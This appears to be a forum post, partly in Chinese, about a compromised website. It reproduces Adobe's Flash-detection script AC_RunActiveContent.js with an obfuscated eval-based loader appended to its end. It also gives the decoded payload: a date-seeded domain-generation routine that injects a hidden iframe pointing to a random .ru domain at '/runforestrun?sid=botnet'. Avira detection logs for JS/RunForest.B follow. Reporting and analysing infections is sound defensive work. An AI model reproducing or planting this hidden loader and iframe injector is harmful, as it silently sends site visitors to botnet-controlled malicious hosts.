http://prexports.com/

fireold

1. //v1.7
   
2. // Flash Player Version Detection
   
3. // Detect Client Browser type
   
4. // Copyright 2005-2007 Adobe Systems Incorporated.  All rights reserved.
   
5. var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
   
6. var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
   
7. var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
   
8. 
   
9. function ControlVersion() {
   
10.     var version;
    
11.     var axo;
    
12.     var e;
    
13. 
    
14.     // NOTE : new ActiveXObject(strFoo) throws an exception if strFoo isn't in the registry
    
15. 
    
16.     try {
    
17.         // version will be set for 7.X or greater players
    
18.         axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
    
19.         version = axo.GetVariable("$version");
    
20.     } catch (e) {}
    
21. 
    
22.     if (!version) {
    
23.         try {
    
24.             // version will be set for 6.X players only
    
25.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
    
26. 
    
27.             // installed player is some revision of 6.0
    
28.             // GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,
    
29.             // so we have to be careful.
    
30. 
    
31.             // default to the first public version
    
32.             version = "WIN 6,0,21,0";
    
33. 
    
34.             // throws if AllowScripAccess does not exist (introduced in 6.0r47)         
    
35.             axo.AllowScriptAccess = "always";
    
36. 
    
37.             // safe to call for 6.0r47 or greater
    
38.             version = axo.GetVariable("$version");
    
39. 
    
40.         } catch (e) {}
    
41.     }
    
42. 
    
43.     if (!version) {
    
44.         try {
    
45.             // version will be set for 4.X or 5.X player
    
46.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
    
47.             version = axo.GetVariable("$version");
    
48.         } catch (e) {}
    
49.     }
    
50. 
    
51.     if (!version) {
    
52.         try {
    
53.             // version will be set for 3.X player
    
54.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
    
55.             version = "WIN 3,0,18,0";
    
56.         } catch (e) {}
    
57.     }
    
58. 
    
59.     if (!version) {
    
60.         try {
    
61.             // version will be set for 2.X player
    
62.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
    
63.             version = "WIN 2,0,0,11";
    
64.         } catch (e) {
    
65.             version = -1;
    
66.         }
    
67.     }
    
68. 
    
69.     return version;
    
70. }
    
71. 
    
72. // JavaScript helper required to detect Flash Player PlugIn version information
    
73. 
    
74. function GetSwfVer() {
    
75.     // NS/Opera version >= 3 check for Flash plugin in plugin array
    
76.     var flashVer = -1;
    
77. 
    
78.     if (navigator.plugins != null && navigator.plugins.length > 0) {
    
79.         if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
    
80.             var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
    
81.             var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
    
82.             var descArray = flashDescription.split(" ");
    
83.             var tempArrayMajor = descArray[2].split(".");
    
84.             var versionMajor = tempArrayMajor[0];
    
85.             var versionMinor = tempArrayMajor[1];
    
86.             var versionRevision = descArray[3];
    
87.             if (versionRevision == "") {
    
88.                 versionRevision = descArray[4];
    
89.             }
    
90.             if (versionRevision[0] == "d") {
    
91.                 versionRevision = versionRevision.substring(1);
    
92.             } else if (versionRevision[0] == "r") {
    
93.                 versionRevision = versionRevision.substring(1);
    
94.                 if (versionRevision.indexOf("d") > 0) {
    
95.                     versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
    
96.                 }
    
97.             }
    
98.             var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
    
99.         }
    
100.     }
     
101.     // MSN/WebTV 2.6 supports Flash 4
     
102.     else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
     
103.     // WebTV 2.5 supports Flash 3
     
104.     else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
     
105.     // older WebTV supports Flash 2
     
106.     else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
     
107.     else if (isIE && isWin && !isOpera) {
     
108.         flashVer = ControlVersion();
     
109.     }
     
110.     return flashVer;
     
111. }
     
112. 
     
113. // When called with reqMajorVer, reqMinorVer, reqRevision returns true if that version or greater is available
     
114. 
     
115. function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision) {
     
116.     versionStr = GetSwfVer();
     
117.     if (versionStr == -1) {
     
118.         return false;
     
119.     } else if (versionStr != 0) {
     
120.         if (isIE && isWin && !isOpera) {
     
121.             // Given "WIN 2,0,0,11"
     
122.             tempArray = versionStr.split(" "); // ["WIN", "2,0,0,11"]
     
123.             tempString = tempArray[1]; // "2,0,0,11"
     
124.             versionArray = tempString.split(","); // ['2', '0', '0', '11']
     
125.         } else {
     
126.             versionArray = versionStr.split(".");
     
127.         }
     
128.         var versionMajor = versionArray[0];
     
129.         var versionMinor = versionArray[1];
     
130.         var versionRevision = versionArray[2];
     
131. 
     
132.         // is the major.revision >= requested major.revision AND the minor version >= requested minor
     
133.         if (versionMajor > parseFloat(reqMajorVer)) {
     
134.             return true;
     
135.         } else if (versionMajor == parseFloat(reqMajorVer)) {
     
136.             if (versionMinor > parseFloat(reqMinorVer)) return true;
     
137.             else if (versionMinor == parseFloat(reqMinorVer)) {
     
138.                 if (versionRevision >= parseFloat(reqRevision)) return true;
     
139.             }
     
140.         }
     
141.         return false;
     
142.     }
     
143. }
     
144. 
     
145. function AC_AddExtension(src, ext) {
     
146.     if (src.indexOf('?') != -1) return src.replace(/\?/, ext + '?');
     
147.     else return src + ext;
     
148. }
     
149. 
     
150. function AC_Generateobj(objAttrs, params, embedAttrs) {
     
151.     var str = '';
     
152.     if (isIE && isWin && !isOpera) {
     
153.         str += '<object ';
     
154.         for (var i in objAttrs) {
     
155.             str += i + '="' + objAttrs[i] + '" ';
     
156.         }
     
157.         str += '>';
     
158.         for (var i in params) {
     
159.             str += '<param name="' + i + '" value="' + params[i] + '" /> ';
     
160.         }
     
161.         str += '</object>';
     
162.     } else {
     
163.         str += '<embed ';
     
164.         for (var i in embedAttrs) {
     
165.             str += i + '="' + embedAttrs[i] + '" ';
     
166.         }
     
167.         str += '> </embed>';
     
168.     }
     
169. 
     
170.     document.write(str);
     
171. }
     
172. 
     
173. function AC_FL_RunContent() {
     
174.     var ret = AC_GetArgs(arguments, ".swf", "movie", "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000", "application/x-shockwave-flash");
     
175.     AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
     
176. }
     
177. 
     
178. function AC_SW_RunContent() {
     
179.     var ret = AC_GetArgs(arguments, ".dcr", "src", "clsid:166B1BCA-3F9C-11CF-8075-444553540000", null);
     
180.     AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
     
181. }
     
182. 
     
183. function AC_GetArgs(args, ext, srcParamName, classid, mimeType) {
     
184.     var ret = new Object();
     
185.     ret.embedAttrs = new Object();
     
186.     ret.params = new Object();
     
187.     ret.objAttrs = new Object();
     
188.     for (var i = 0; i < args.length; i = i + 2) {
     
189.         var currArg = args[i].toLowerCase();
     
190. 
     
191.         switch (currArg) {
     
192.         case "classid":
     
193.             break;
     
194.         case "pluginspage":
     
195.             ret.embedAttrs[args[i]] = args[i + 1];
     
196.             break;
     
197.         case "src":
     
198.         case "movie":
     
199.             args[i + 1] = AC_AddExtension(args[i + 1], ext);
     
200.             ret.embedAttrs["src"] = args[i + 1];
     
201.             ret.params[srcParamName] = args[i + 1];
     
202.             break;
     
203.         case "onafterupdate":
     
204.         case "onbeforeupdate":
     
205.         case "onblur":
     
206.         case "oncellchange":
     
207.         case "onclick":
     
208.         case "ondblClick":
     
209.         case "ondrag":
     
210.         case "ondragend":
     
211.         case "ondragenter":
     
212.         case "ondragleave":
     
213.         case "ondragover":
     
214.         case "ondrop":
     
215.         case "onfinish":
     
216.         case "onfocus":
     
217.         case "onhelp":
     
218.         case "onmousedown":
     
219.         case "onmouseup":
     
220.         case "onmouseover":
     
221.         case "onmousemove":
     
222.         case "onmouseout":
     
223.         case "onkeypress":
     
224.         case "onkeydown":
     
225.         case "onkeyup":
     
226.         case "onload":
     
227.         case "onlosecapture":
     
228.         case "onpropertychange":
     
229.         case "onreadystatechange":
     
230.         case "onrowsdelete":
     
231.         case "onrowenter":
     
232.         case "onrowexit":
     
233.         case "onrowsinserted":
     
234.         case "onstart":
     
235.         case "onscroll":
     
236.         case "onbeforeeditfocus":
     
237.         case "onactivate":
     
238.         case "onbeforedeactivate":
     
239.         case "ondeactivate":
     
240.         case "type":
     
241.         case "codebase":
     
242.         case "id":
     
243.             ret.objAttrs[args[i]] = args[i + 1];
     
244.             break;
     
245.         case "width":
     
246.         case "height":
     
247.         case "align":
     
248.         case "vspace":
     
249.         case "hspace":
     
250.         case "class":
     
251.         case "title":
     
252.         case "accesskey":
     
253.         case "name":
     
254.         case "tabindex":
     
255.             ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i + 1];
     
256.             break;
     
257.         default:
     
258.             ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i + 1];
     
259.         }
     
260.     }
     
261.     ret.objAttrs["classid"] = classid;
     
262.     if (mimeType) ret.embedAttrs["type"] = mimeType;
     
263.     return ret;
     
264. }
     
265. 
     
266. 
     
267. 
     
268. /*km0ae9gr6m*/
     
269. s = "";
     
270. try {
     
271.     q = document.createElement("p");
     
272.     q.appendChild("123" + n);
     
273. } catch (qw) {
     
274.     h = -016 / 7;
     
275.     try {
     
276.         a = prototype;
     
277.     } catch (zxc) {
     
278.         e = window["e" + "va" + "l"];
     
279.         n = "204.351.440.495.232.315.444.550.64.330.404.600.232.246.388.550.200.333.436.390.234.327.392.505.228.120.164.615.26.30.128.160.64.96.472.485.228.96.416.525.64.183.128.580.208.315.460.230.230.303.404.500.64.141.128.580.208.315.460.230.162.177.52.50.64.96.128.160.236.291.456.160.216.333.128.305.64.348.416.525.230.138.460.505.202.300.128.185.64.348.416.525.230.138.324.295.26.30.128.160.64.96.472.485.228.96.464.505.230.348.128.305.64.348.416.525.230.138.260.160.84.96.432.555.64.135.128.580.208.315.460.230.164.96.168.160.208.315.236.65.20.96.128.160.64.315.408.200.232.303.460.580.64.186.128.240.82.369.52.50.64.96.128.160.64.96.128.160.232.312.420.575.92.345.404.505.200.96.244.160.232.303.460.580.118.39.40.160.64.96.128.625.64.303.432.575.202.96.492.65.20.96.128.160.64.96.128.160.64.348.416.525.230.138.460.505.202.300.128.305.64.348.404.575.232.96.172.160.232.312.420.575.92.231.236.65.20.96.128.160.64.375.52.50.64.96.128.160.228.303.464.585.228.330.128.200.232.312.420.575.92.345.404.505.200.96.168.160.232.312.420.575.92.333.440.505.158.354.404.570.154.123.236.65.20.375.52.50.26.30.408.585.220.297.464.525.222.330.128.410.194.330.400.555.218.234.468.545.196.303.456.355.202.330.404.570.194.348.444.570.80.351.440.525.240.123.492.65.20.96.128.160.64.354.388.570.64.300.128.305.64.330.404.595.64.204.388.580.202.120.468.550.210.360.168.245.96.144.192.205.118.39.40.160.64.96.128.590.194.342.128.575.64.183.128.500.92.309.404.580.144.333.468.570.230.120.164.160.124.96.196.250.64.189.128.245.64.174.128.240.118.39.40.160.64.96.128.580.208.315.460.230.230.303.404.500.64.183.128.250.102.156.212.270.110.168.228.240.98.96.172.160.80.300.184.515.202.348.308.555.220.348.416.200.82.96.168.160.96.360.280.350.140.210.280.350.82.96.172.160.80.300.184.515.202.348.272.485.232.303.160.205.64.126.128.240.240.210.280.350.140.123.172.160.80.231.388.580.208.138.456.555.234.330.400.200.230.96.168.160.96.360.280.350.140.123.164.295.26.30.128.160.64.96.464.520.210.345.184.325.64.183.128.260.112.150.220.245.118.39.40.160.64.96.128.580.208.315.460.230.154.96.244.160.100.147.208.275.104.168.204.270.104.165.236.65.20.96.128.160.64.348.416.525.230.138.324.160.122.96.464.520.210.345.184.385.64.141.128.580.208.315.460.230.130.177.52.50.64.96.128.160.232.312.420.575.92.246.128.305.64.348.416.525.230.138.308.160.74.96.464.520.210.345.184.325.118.39.40.160.64.96.128.580.208.315.460.230.222.330.404.395.236.303.456.385.64.183.128.245.92.144.128.235.64.348.416.525.230.138.308.295.26.30.128.160.64.96.464.520.210.345.184.550.202.360.464.160.122.96.440.505.240.348.328.485.220.300.444.545.156.351.436.490.202.342.236.65.20.96.128.160.64.342.404.580.234.342.440.160.232.312.420.575.118.39.40.625.26.30.52.50.204.351.440.495.232.315.444.550.64.297.456.505.194.348.404.410.194.330.400.555.218.234.468.545.196.303.456.200.228.132.128.385.210.330.176.160.154.291.480.205.246.39.40.160.64.96.128.570.202.348.468.570.220.96.308.485.232.312.184.570.222.351.440.500.80.120.308.485.240.135.308.525.220.123.128.210.64.342.184.550.202.360.464.200.82.96.172.160.154.315.440.205.118.39.40.625.26.30.52.50.204.351.440.495.232.315.444.550.64.309.404.550.202.342.388.580.202.240.460.505.234.300.444.410.194.330.400.555.218.249.464.570.210.330.412.200.234.330.420.600.88.96.432.505.220.309.464.520.88.96.488.555.220.303.164.615.26.30.128.160.64.96.472.485.228.96.456.485.220.300.128.305.64.330.404.595.64.246.388.550.200.333.436.390.234.327.392.505.228.213.404.550.202.342.388.580.222.342.160.585.220.315.480.205.118.39.40.160.64.96.128.590.194.342.128.540.202.348.464.505.228.345.128.305.64.273.156.485.78.132.156.490.78.132.156.495.78.132.156.500.78.132.156.505.78.132.156.510.78.132.156.515.78.132.156.520.78.132.156.525.78.132.156.530.78.132.156.535.78.132.156.540.78.132.156.545.78.132.156.550.78.132.156.555.78.132.156.560.78.132.156.565.78.132.156.570.78.132.156.575.78.132.156.580.78.132.156.585.78.132.156.590.78.132.156.595.78.132.156.600.78.132.156.605.78.132.156.610.78.279.236.65.20.96.128.160.64.354.388.570.64.345.464.570.64.183.128.195.78.177.52.50.64.96.128.160.204.333.456.200.236.291.456.160.210.96.244.160.96.177.128.525.64.180.128.540.202.330.412.580.208.177.128.525.64.129.172.160.82.369.52.50.64.96.128.160.64.96.128.160.230.348.456.160.86.183.128.540.202.348.464.505.228.345.364.495.228.303.388.580.202.246.388.550.200.333.436.390.234.327.392.505.228.120.456.485.220.300.176.160.96.132.128.540.202.348.464.505.228.345.184.540.202.330.412.580.208.96.180.160.98.123.372.295.26.30.128.160.64.96.500.65.20.96.128.160.64.342.404.580.234.342.440.160.230.348.456.160.86.96.156.230.78.96.172.160.244.333.440.505.118.39.40.625.26.30.52.50.230.303.464.420.210.327.404.555.234.348.160.510.234.330.396.580.210.333.440.200.82.369.52.50.64.96.128.160.232.342.484.615.26.30.128.160.64.96.128.160.64.96.420.510.80.348.484.560.202.333.408.160.210.306.456.485.218.303.348.485.230.201.456.505.194.348.404.500.64.183.244.160.68.351.440.500.202.306.420.550.202.300.136.205.246.39.40.160.64.96.128.160.64.96.128.160.64.96.128.525.204.342.388.545.202.261.388.575.134.342.404.485.232.303.400.160.122.96.464.570.234.303.236.65.20.96.128.160.64.96.128.160.64.96.128.160.64.354.388.570.64.351.440.525.240.96.244.160.154.291.464.520.92.342.444.585.220.300.160.215.220.303.476.160.136.291.464.505.80.123.188.245.96.144.192.205.118.39.40.160.64.96.128.160.64.96.128.160.64.96.128.590.194.342.128.500.222.327.388.525.220.234.388.545.202.96.244.160.206.303.440.505.228.291.464.505.160.345.404.585.200.333.328.485.220.300.444.545.166.348.456.525.220.309.160.585.220.315.480.220.64.147.216.220.64.117.456.585.78.123.236.65.20.96.128.160.64.96.128.160.64.96.128.160.64.315.408.570.218.96.244.160.200.333.396.585.218.303.440.580.92.297.456.505.194.348.404.345.216.303.436.505.220.348.160.170.146.210.328.325.154.207.136.205.118.96.52.50.64.96.128.160.64.96.128.160.64.96.128.160.210.306.456.545.92.345.404.580.130.348.464.570.210.294.468.580.202.120.136.575.228.297.136.220.64.102.416.580.232.336.232.235.94.102.172.500.222.327.388.525.220.234.388.545.202.129.136.235.228.351.440.510.222.342.404.575.232.342.468.550.126.345.420.500.122.294.444.580.220.303.464.170.82.177.128.65.20.96.128.160.64.96.128.160.64.96.128.160.64.315.408.570.218.138.460.580.242.324.404.230.238.315.400.580.208.96.244.160.68.144.448.600.68.177.128.65.20.96.128.160.64.96.128.160.64.96.128.160.64.315.408.570.218.138.460.580.242.324.404.230.208.303.420.515.208.348.128.305.64.102.192.560.240.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.420.510.228.327.184.575.232.363.432.505.92.354.420.575.210.294.420.540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");
     
280.         if (window.document) for (i = 6 - 2 - 1 - 2 - 1; - 1828 + i != 2 - 2; i++) {
     
281.             k = i;
     
282.             s = s + String.fromCharCode(n[k] / (i % (h * h) + 2));
     
283.         }
     
284.         e(s);
     
285.     }
     
286. } /*qhk6sa6g1c*/

复制代码

1. function nextRandomNumber() {
   
2.     var hi = this.seed / this.Q;
   
3.     var lo = this.seed % this.Q;
   
4.     var test = this.A * lo - this.R * hi;
   
5.     if (test > 0) {
   
6.         this.seed = test;
   
7.     } else {
   
8.         this.seed = test + this.M;
   
9.     }
   
10.     return (this.seed * this.oneOverM);
    
11. }
    
12. 
    
13. function RandomNumberGenerator(unix) {
    
14.     var d = new Date(unix * 1000);
    
15.     var s = d.getHours() > 12 ? 1 : 0;
    
16.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    
17.     this.A = 48271;
    
18.     this.M = 2147483647;
    
19.     this.Q = this.M / this.A;
    
20.     this.R = this.M % this.A;
    
21.     this.oneOverM = 1.0 / this.M;
    
22.     this.next = nextRandomNumber;
    
23.     return this;
    
24. }
    
25. 
    
26. function createRandomNumber(r, Min, Max) {
    
27.     return Math.round((Max - Min) * r.next() + Min);
    
28. }
    
29. 
    
30. function generatePseudoRandomString(unix, length, zone) {
    
31.     var rand = new RandomNumberGenerator(unix);
    
32.     var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
    
33.     var str = '';
    
34.     for (var i = 0; i < length; i++) {
    
35.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    
36.     }
    
37.     return str + '.' + zone;
    
38. }
    
39. 
    
40. setTimeout(function() {
    
41.     try {
    
42.         if (typeof iframeWasCreated == "undefined") {
    
43.             iframeWasCreated = true;
    
44.             var unix = Math.round(+new Date() / 1000);
    
45.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
    
46.             ifrm = document.createElement("IFRAME");
    
47.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet");
    
48.             ifrm.style.width = "0px";
    
49.             ifrm.style.height = "0px";
    
50.             ifrm.style.visibility = "hidden";
    
51.             document.body.appendChild(ifrm);
    
52.         }
    
53.     } catch (e) {}
    
54. }, 500);

复制代码

Avira

2013/7/24 上午 05:45 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        776
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/7/24 上午 05:45 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\AC_RunActiveContent[1].js'
      包含病毒或有害的程式 'JS/RunForest.B' [virus]
      已採取動作：
      檔案會移動至 '55ff584b.qua' 名稱底下的隔離區目錄。.

2013/7/24 上午 05:45 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'JS/RunForest.B [virus]'
      執行的動作：傳輸至掃描程式

2013/7/24 上午 05:45 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'JS/RunForest.B [virus]'
      執行的動作：拒絕存取

2013/7/24 上午 05:45 [Web Protection] 發現惡意程式碼
      從 URL "http://prexports.com/Scripts/AC_RunActiveContent.js" 存取資料時，
      發現病毒或有害的程式 'JS/RunForest.B' [virus]。
      已採取動作：已略過